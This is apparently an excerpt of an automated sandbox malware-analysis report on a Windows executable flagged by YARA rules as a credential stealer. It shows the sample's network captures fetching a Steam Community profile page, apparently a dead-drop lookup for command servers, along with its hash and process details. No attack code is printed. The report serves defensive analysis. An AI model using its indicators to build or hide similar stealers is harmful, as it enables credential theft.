                                                                                                                                                                                                                                                  2025-03-17 00:04:31 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                                                  2025-03-17 00:04:31 UTC10166INData Raw: 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                                                  Data Ascii: k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
                                                                                                                                                                                                                                                  2025-03-17 00:04:31 UTC1932INData Raw: 73 65 63 74 69 6f 6e 54 65 78 74 22 3e 0a 09 09 09 09 41 6e 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 3a 3c 62 72 3e 3c 62 72 3e 0a 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 68 33 3e 46 61 69 6c 65 64 20 6c 6f 61 64 69 6e 67 20 70 72 6f 66 69 6c 65 20 64 61 74 61 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 68 33 3e 3c 62 72 3e 3c 62 72 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 72 65 74 75 72 6e 4c 69 6e 6b 22 3e 48 65 72 65 27 73 20 61 20 6c 69 6e 6b 20 74 6f 20 74 68 65 20 53 74 65 61 6d 20 43 6f 6d 6d 75 6e 69 74 79 20 3c 61 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 53 74 61 6e 64 61 72 64 22 20 68 72 65 66 3d 22
                                                                                                                                                                                                                                                  Data Ascii: sectionText">An error was encountered while processing your request:<br><br></p><h3>Failed loading profile data, please try again later.</h3><br><br><p class="returnLink">Here's a link to the Steam Community <a class="linkStandard" href="


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  14192.168.2.44974323.192.247.894437384C:\Users\user\Desktop\12Kp1xbcjv.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-03-17 00:04:31 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                  2025-03-17 00:04:32 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Date: Mon, 17 Mar 2025 00:04:32 GMT
                                                                                                                                                                                                                                                  Content-Length: 26508
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: sessionid=8d2f1eae79dc2596f9bf81a2; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                  2025-03-17 00:04:32 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                                                  2025-03-17 00:04:32 UTC10166INData Raw: 6b 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 70 75 6c 6c 64 6f 77 6e 22 20 6f 6e 63 6c 69 63 6b 3d 22 53 68 6f 77 4d 65 6e 75 28 20 74 68 69 73 2c 20 27 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 27 2c 20 27 72 69 67 68 74 27 20 29 3b 22 3e 6c 61 6e 67 75 61 67 65 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6c 6f 63 6b 5f 6e 65 77 22 20 69 64 3d 22 6c 61 6e 67 75 61 67 65 5f 64 72 6f 70 64 6f 77 6e 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 62 6f 64 79 20 70 6f 70 75 70 5f 6d 65 6e 75 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                                                                  Data Ascii: k" id="language_pulldown" onclick="ShowMenu( this, 'language_dropdown', 'right' );">language</span><div class="popup_block_new" id="language_dropdown" style="display: none;"><div class="popup_body popup_menu">
                                                                                                                                                                                                                                                  2025-03-17 00:04:32 UTC1932INData Raw: 73 65 63 74 69 6f 6e 54 65 78 74 22 3e 0a 09 09 09 09 41 6e 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 3a 3c 62 72 3e 3c 62 72 3e 0a 09 09 09 3c 2f 70 3e 0a 09 09 09 3c 68 33 3e 46 61 69 6c 65 64 20 6c 6f 61 64 69 6e 67 20 70 72 6f 66 69 6c 65 20 64 61 74 61 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 68 33 3e 3c 62 72 3e 3c 62 72 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 72 65 74 75 72 6e 4c 69 6e 6b 22 3e 48 65 72 65 27 73 20 61 20 6c 69 6e 6b 20 74 6f 20 74 68 65 20 53 74 65 61 6d 20 43 6f 6d 6d 75 6e 69 74 79 20 3c 61 20 63 6c 61 73 73 3d 22 6c 69 6e 6b 53 74 61 6e 64 61 72 64 22 20 68 72 65 66 3d 22
                                                                                                                                                                                                                                                  Data Ascii: sectionText">An error was encountered while processing your request:<br><br></p><h3>Failed loading profile data, please try again later.</h3><br><br><p class="returnLink">Here's a link to the Steam Community <a class="linkStandard" href="


                                                                                                                                                                                                                                                  Statistics

                                                                                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                                                                                  050100s020406080100

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                                                                                  050100s0.005101520MB

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                                                                                  • File
                                                                                                                                                                                                                                                  • Registry

                                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                                  System Behavior

                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                  Start time:20:04:11
                                                                                                                                                                                                                                                  Start date:16/03/2025
                                                                                                                                                                                                                                                  Path:C:\Users\user\Desktop\12Kp1xbcjv.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\12Kp1xbcjv.exe"
                                                                                                                                                                                                                                                  Imagebase:0xd30000
                                                                                                                                                                                                                                                  File size:1'309'696 bytes
                                                                                                                                                                                                                                                  MD5 hash:924ABE4B44086EF603A68CE2B2F26B67
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1280565524.0000000000823000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1280817363.0000000000823000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1265843707.0000000000823000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true
                                                                                                                                                                                                                                                  Show Windows behavior

                                                                                                                                                                                                                                                  File Activities

                                                                                                                                                                                                                                                  Show Windows behavior

                                                                                                                                                                                                                                                  Section Activities

                                                                                                                                                                                                                                                  Show Windows behavior

                                                                                                                                                                                                                                                  Registry Activities

                                                                                                                                                                                                                                                  Show Windows behavior

                                                                                                                                                                                                                                                  COM Activities

                                                                                                                                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                  Show Windows behavior

                                                                                                                                                                                                                                                  Thread Activities

                                                                                                                                                                                                                                                  Show Windows behavior

                                                                                                                                                                                                                                                  Memory Activities

                                                                                                                                                                                                                                                  Show Windows behavior

                                                                                                                                                                                                                                                  System Activities

                                                                                                                                                                                                                                                  Show Windows behavior

                                                                                                                                                                                                                                                  Timing Activities

                                                                                                                                                                                                                                                  Show Windows behavior

                                                                                                                                                                                                                                                  Windows UI Activities

                                                                                                                                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                                                                                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                  No disassembly